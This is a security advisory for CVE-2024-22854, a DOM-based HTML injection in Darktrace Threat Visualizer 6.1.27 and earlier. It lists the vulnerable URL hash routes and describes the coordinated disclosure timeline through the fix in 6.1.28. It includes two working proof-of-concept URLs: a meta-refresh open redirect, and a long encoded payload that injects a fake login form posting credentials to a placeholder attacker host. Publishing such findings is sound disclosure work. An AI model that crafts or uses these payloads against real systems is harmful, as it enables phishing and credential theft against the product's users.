CVE-2024-22854

DOM HTML injection vulnerability in Darktrace Threat Visualizer due to incorrectly handled window.location.hash

DOM-based HTML injection vulnerability in the main page of Darktrace Threat Visualizer <= 6.1.27 (bundle version 61050) has been identified. A URL, crafted by a remote attacker and visited by an authenticated user, allows open redirect and potential credential stealing using an injected HTML form.

Description

DOM-based HTML injection vulnerability in the Darktrace Threat Visualizer <= 6.1.27 (bundle version: 61050) has been identified. Vulnerability applies to the main page of Threat Visualizer and is caused by missing proper validation and encoding of window.location.hash value for multiple routes:

• #ip/*
• #uid/*
• #aiincident/*
• #aiaincidentevent/*
• #aiagroup/*
• #aiasimulation/*
• #modelbreach/*

Unfiltered values are being injected in multiple places in generated HTML code.

To exploit the vulnerability, a link crafted by an attacker must be opened by an authenticated user. Impact is limited due to implementation of Content Security Policy. Nevertheless, some attack scenarios that pose a threat to users are still possible. CSP header prevents injection of resources from external sources and executing injected JavaScript code (XSS attack) but does not protect against manipulation of page code achieved by inserting HTML tags and CSS code.

Example attack scenarios:

• open redirect;
• modifying webpage appearance to manipulate user behavior (e.g. injecting fake login form to steal user credentials).

POC 1: Open redirect

By injecting the meta tag, it is possible to redirect authenticated user to any website controlled by the attacker.

Payload: https://[darktrace]/#ip/%22%3E%3Cmeta%20http-equiv='refresh'%20content='0;https:%2F%2Fyoutu.be%2FdQw4w9WgXcQ'%3E

After an authenticated user visits the URL, they will be redirected to https://youtu.be/dQw4w9WgXcQ

POC 2: Credential stealing via fake login form

By injecting the HTML code and CSS styles, it is possible to insert a login form into the page that looks identical to the Darktrace sign-in form. After submitting the injected form, inserted credentials will be sent by POST method to the website controlled by the attacker.

Payload: https://[darktrace]/#uid/%22%3E%3Clink%20rel%3D%27stylesheet%27%20href%3D%27%2Fsabre%2Dweb%2Flogin%2Flogin%2Ecss%27%3E%3Cstyle%3E%23threat%2Dlog%2Dwrapper%7Bdisplay%3Anone%7D%23x%7Bposition%3Afixed%3Btop%3A0%3Bleft%3A0%3Bbackground%3Argb%288%2C10%2C13%29%3Bheight%3A100%25%3Bwidth%3A100%25%3Bz%2Dindex%3A100000%3Bdisplay%3Aflex%3Bjustify%2Dcontent%3Acenter%3Balign%2Ditems%3Acenter%7D%3C%2Fstyle%3E%3Cdiv%20id%3D%27x%27%20class%3D%27login%27%3E%3Cdiv%20class%3D%27login%5F%5Fcard%20login%5F%5Fcard%2D%2Dvisible%27%20role%3D%27main%27%20aria%2Dlabelledby%3D%27threat%2Dversion%27%3E%3Cimg%20src%3D%27%2Fdt%2Dassets%2Flogo%2FSVG%2Fdt%2Dlogo%2Dwhite%2Esvg%27%20alt%3D%27Darktrace%20login%27%3E%3Ch4%20class%3D%27login%5F%5Fversion%27%3EThreat%20Visualizer%206%2E1%3C%2Fh4%3E%3Cdiv%20class%3D%27login%5F%5Fcontents%27%3E%3Cform%20class%3D%27login%5F%5Fform%27%20id%3D%27account%2Dform%27%20action%3D%27https%3A%2F%2Fattacker%27%20method%3D%27post%27%3E%3Cdiv%20class%3D%27dt%2Dinput%2Dvalidate%20user%27%3E%3Cinput%20class%3D%27dt%2Dinput%27%20id%3D%27username%27%20spellcheck%3D%27false%27%20aria%2Dlabel%3D%27Username%27%20name%3D%27username%27%20type%3D%27text%27%20placeholder%3D%27Username%27%20required%3D%27%27%3E%3Clabel%20class%3D%27dt%2Dinput%5F%5Flabel%27%3EPlease%20enter%20your%20username%3C%2Flabel%3E%3Cspan%20class%3D%27dt%2Dinput%5F%5Findicator%27%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20class%3D%27dt%2Dinput%2Dvalidate%27%3E%3Cinput%20class%3D%27dt%2Dinput%27%20id%3D%27password%27%20aria%2Dlabel%3D%27Password%27%20name%3D%27password%27%20type%3D%27password%27%20placeholder%3D%27Password%27%20autocomplete%3D%27off%27%20required%3D%27%27%3E%3Clabel%20class%3D%27dt%2Dinput%5F%5Flabel%27%3EPlease%20enter%20your%20password%3C%2Flabel%3E%3Cinput%20id%3D%27location%27%20name%3D%27next%27%20type%3D%27hidden%27%20value%3D%27%27%3E%3Cspan%20class%3D%27dt%2Dinput%5F%5Findicator%27%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20id%3D%27error%2Dcontainer%27%3E%3Cdiv%20class%3D%27dt%2Dtoast%20dt%2Dtoast%2D%2Dwarning%20dt%2Dtoast%2D%2Dhidden%27%20id%3D%27caps%2Dlock%2Dwarning%27%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cinput%20class%3D%27dt%2Dbutton%27%20id%3D%27login%2Dbtn%27%20type%3D%27submit%27%20value%3D%27Log%20In%27%3E%3C%2Fform%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

After an authenticated user visits the URL, a fake login form will be shown:

Timeline

17.12.2023 08:49 CET

Vulnerability reported in accordance with the vulnerability disclosure policy of Darktrace.

27.12.2023 13:14 CET

E-mail sent to Darktrace requesting confirmation of receipt of the report.

02.01.2024 14:44 CET

Response from Darktrace received – vulnerability confirmed and fix added in of 6.1.28 (bundle 61051).

04.01.2024 16:10 CET

Fix tested in 6.1.28 (bundle 61051), mitigation confirmed. Additional suggestions regarding possible improvements has been provided.